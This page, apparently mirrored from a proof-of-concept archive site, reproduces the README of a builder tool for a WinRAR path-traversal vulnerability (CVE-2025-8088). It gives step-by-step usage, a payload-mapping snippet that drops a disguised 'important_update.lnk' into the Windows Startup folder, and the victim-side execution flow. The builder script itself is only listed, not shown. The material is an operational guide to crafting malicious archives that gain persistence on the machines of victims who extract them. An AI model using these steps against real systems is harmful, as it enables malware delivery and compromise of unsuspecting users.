关联漏洞
描述
A POC exploit for WinRAR vulnerability (CVE-2025-8088) affecting versions 7.12 and lower
介绍
# CVE-2025-8088-WinRAR-builder
A POC exploit for WinRAR vulnerability (CVE-2025-8088) affecting versions 7.12 and lower
## 🚀 How It Works
1. Creates a Rar embed with other payloads
2. Using Multiple ADS Streams 🔄 - Attaches payload streams with different path traversal depths
3. Manipulates RAR Headers ⚙️ - Modifies archive structure to exploit path traversal vulnerability
4. Drops Payload to Startup 📂 - Attempts to write payload to Windows startup folder when extracted
## 🛠️ Usage
1. Clone the repository
```bash
git clone https://github.com/papcaii2004/CVE-2025-8088-WinRAR-builder.git
cd CVE-2025-8088-WinRAR-builder
```
2. Prepare payloads
```
mkdir payloads
```
- Add our payloads to that folder (exe, dll, lnk, ...)
- Modify `PAYLOAD_MAPPING` in the script
```python
# 2. Map our payload to corresponding destination
# Format: (filename_in_payloads_dir, target_extract_dest)
PAYLOAD_MAPPING: List[Tuple[str, str]] = [
# Payload 1
("payload.lnk", "..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\important_update.lnk"),
# Payload 2
("image.png", "C:\\Users\\Public\\Downloads\\logo.png"),
# Payload 3
# Add your own
]
```
3. Run the exploit
```
python builder.py <decoy_file>
```
## 🔄 Execution Flow
1. Victim extracts the RAR with vulnerable WinRAR (≤7.12)
2. Payload gets written to destination folder, e.g. :
```bash
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
```
3. On next reboot ➡️ payload executes automatically
## 📋 Requirements
- Windows OS 🪟
- Python 3.x 🐍
- WinRAR installed
文件快照
[4.0K] /data/pocs/84fa7f9578a94858044f5468e59de6bc0c05502d
├── [9.9K] builder.py
└── [1.6K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。